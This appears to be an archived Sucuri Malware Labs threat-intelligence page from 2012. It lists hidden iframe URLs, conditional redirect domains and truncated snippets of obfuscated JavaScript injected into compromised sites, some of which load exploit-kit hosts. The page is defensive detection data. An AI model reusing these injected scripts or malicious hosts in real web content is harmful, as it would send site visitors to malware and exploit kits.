Sucuri Malware Labs

Sucuri on Twitter Sucuri on Facebook Sucuri on LinkedIn

Historic malware entries for 2012-08-03Home  |  Notes  |  Malware data  |  Signatures  |  Tools  |  About

      Archived data:   Latest   |   2013-05-15   |   2013-05-14   |   2013-05-13   |   2013-05-12   |   2013-05-07   |   2013-05-02   |   2013-05-01   |   2013-04-29   |   More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
38iframehttp://whitecada.ru/in.cgi?16
36iframehttp://hazelwave.ru/in.cgi?16
26iframehttp://monmonmedia.com/main.php
18iframehttp://simplevid.tv/wordpress.php
13iframehttp://cabaniaseleden.com.ar/stats.php
13iframehttp://bitcolony.ru/in.cgi?16
12iframehttp://interviewerbacklit.org/news.php?id=e6f6402caf60df3a
12iframehttp://blogroute.ru/in.cgi?16
11iframehttp://transcriptsdelivers.org/news.php?id=e6f6402caf60df3a
11iframehttp://niu-sae.com/stats.php
10iframehttp://purplefrigate.ru/in.cgi?16
10iframehttp://brownform.ru/in.cgi?15
7iframehttp://azureriver.ru/in.cgi?15
6iframehttp://oxsanasiberians.com/downloads/stats.php
6iframehttp://katestat.info/in.cgi?9
5iframehttp://playart.org/sites/stats.php
5iframehttp://methuenedge.com/stats.php
4iframehttp://zumobtr.ru/gate.php?f=1036767
4iframehttp://pinkium.ru/in.cgi?16
3iframehttp://u61s.info/main.php?page=60f9ec0eb067e648
3iframehttp://rolyjyl.ru/count30.php
3iframehttp://gingertide.ru/in.cgi?15
2iframehttp://google-adsens.com/in.cgi?2
1iframehttp://uploadingbefuddling.org/in.cgi?16
1iframehttp://thomasvillefurnishings.ca/66124443.html
1iframehttp://snapvenue.ru/in.cgi?16
1iframehttp://minigametight.in/in.cgi?7
1iframehttp://kvnxkpc.portrelay.com/vd/43;28a69843acd47672da2be368bfda9b0d
1iframehttp://greenpillar.ru/in.cgi?16
1iframehttp://forkfamiliarity.ind.in/?3
1iframehttp://cuscofishing.com/13854443.html
1iframehttp://blackium.ru/in.cgi?16
1iframehttp://acwf.net/92194443.html
Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
1050redirectionshttp://fitnes-mir.ru/mimosa?5
1004redirectionshttp://fitnesmir.ru/mimosa?5
938redirectionshttp://fitnes-magazine.ru/viola?5
538redirectionshttp://fitnesmagazine.ru/viola?5
275redirectionshttp://fitnesrussia.ru/viola?5
213redirectionshttp://fitnes-mir.ru/mimosa?5
207redirectionshttp://fitnesmir.ru/mimosa?5
186redirectionshttp://fitnes-magazine.ru/viola?5
140redirectionshttp://russianfitnes.ru/viola?5
122redirectionshttp://fitnes-corp.ru/shurimuri?5
111redirectionshttp://fitnesmagazine.ru/viola?5
102redirectionshttp://fitnes-russia.ru/viola?5
55redirectionshttp://fitnesrussia.ru/viola?5
40redirectionshttp://nashifitnes.ru/nonalco?5
35redirectionshttp://whitecada.ru/in.cgi?16
35redirectionshttp://co-fitnes.ru/mimosa?5
31redirectionshttp://verygood2014.ru/in.cgi?11
28redirectionshttp://russianfitnes.ru/viola?5
28redirectionshttp://fitnes-corp.ru/shurimuri?5
23redirectionshttp://fitnes-russia.ru/viola?5
20redirectionshttp://bitcolony.ru/in.cgi?16
19redirectionshttp://miamiheattickets.com/http.php
18redirectionshttp://my-supas.ru/blackmuscats?5
16redirectionshttp://commitse.ru
10redirectionshttp://live-fitnes.ru/shurimuri?5
10redirectionshttp://fvzex80.info/in.cgi?7
10redirectionshttp://blogroute.ru/in.cgi?16
10redirectionshttp://2011-supas.ru/blackmuscat?4
8redirectionshttp://whitecada.ru/in.cgi?16
8redirectionshttp://nashifitnes.ru/nonalco?5
8redirectionshttp://greencricket.ru/in.cgi?16
8redirectionshttp://co-fitnes.ru/mimosa?5
8redirectionshttp://ciscotred.cz.cc/
8redirectionshttp://176.9.179.140/
6redirectionshttp://verygoods24.ru/in.cgi?9
6redirectionshttp://supas-2012.ru/blackmuscat?4
6redirectionshttp://mysupas.ru/blackmuscats?5
6redirectionshttp://medicquil.ru
6redirectionshttp://mcprom.co.cc/
6redirectionshttp://2010-supas.ru/piramas?4
Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
1746javascript<script type="text/javascript" src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js...
440javascript<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="1122..1404..1210..1188..1276..1260..1221...
122javascript<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="143..120..1122..1404..1210..1188..1276.....
93javascript<script type="text/javascript" src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js...
30javascript<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="156..130..1200..1443..1188..1521..1308.....
30javascript<script src="http://andsto57cksstar.rr.nu/sl.php"></script>
27javascript<script>var url="http://camel-paper.com/wp-includes/ads.php";if((navigator.userAgent.toLowerCas...
27javascript<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="108..117..1260..1326..384..520..1200..14...
25javascript<script src="http://andsto57cksstar.rr.nu/sl.php"></script>
22javascript<script type="text/javascript" language="javascript" src="xx" ></script>
20javascript<script language="javascript" type="text/javascript" src="http://js.users.51.la/4387405.js"></s...
18javascript<script type="text/javascript" language="javascript" src="/zz" ></script>
18javascript<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype...
17javascript<script type='text/javascript'>var wow="qub2stionsb3nmb3nb1cob1b3tb1pn";c1="lonly"; if(-1==docu...
17javascript<script type="text/javascript" src="http://rw3000.duu.pl/mltools.js"></script>
17javascript<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="99..108..1155..1224..352..480..1100..133...
16javascript<script type="text/javascript" src="http://gardenstory.pl/mltools.js"></script>
16javascript<script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f=...
16javascript<script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script>
15javascript<script>if(window.document)try{location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0...
13javascript<script src="http://www.medprolab.in/google.js" type="text/javascript"></script>
12javascript<script src="http://tentsf05luxfig.rr.nu/sl.php?v=1"></script>
12javascript<script src="http://sweepstakesandcontestsdo.com/pmg.php?dr=1"></script>
11javascript<script src="http://tentsf05luxfig.rr.nu/sl.php"></script>
11javascript<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
10javascript<script>var url="http://www.lifeshiftdevelopment.com/stats.php";if((navigator.userAgent.toLower...
10javascript<script>s="";try{q=document.createElement("p");q.appendChild("123"+n);}catch(qw){f="fromCharCod...
10javascript<script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script><!--/" onclick="window.location....
9javascript<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype...
9javascript<script src=http://tanikotomotiv.com/images/gifimg.php ></script>
9javascript<script src="http://andsto57cksstar.rr.nu/sl.php"></script><!--Oman Air - "></title><script src...
8javascript<script type='text/javascript'>var wow="rb2volutionwhb2rb2cb3nb1b3ub1pn";c1="lonly"; if(-1==doc...
8javascript<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
7javascript<script>var QgYpfH="cQ5cQBucQ35";var cVPyCRf="Q6FcQ3DcQ27";var ETUD="eplace(/G6L/g";var xhyBcxL...
6javascript<script>s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){...
6javascript<script src="http://lasimp04risoned.rr.nu/sl.php"></script>
6javascript<script>if(window.document)a=("urf3".split+'qwe').substr(0,6);aa=(Date+{}).substr(0,6);if(a===a...
5javascript<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf...
5javascript<script type="text/javascript" src="http://eumemo.com.br/010706.php"></script>
5javascript<script>try{n^=window["ev"+"al"]("pr"+"ototype");}catch(zxc){e=eval;n="143..120..1122..1404..12...
Limited view (40 rows)... Only the top entries being displayed.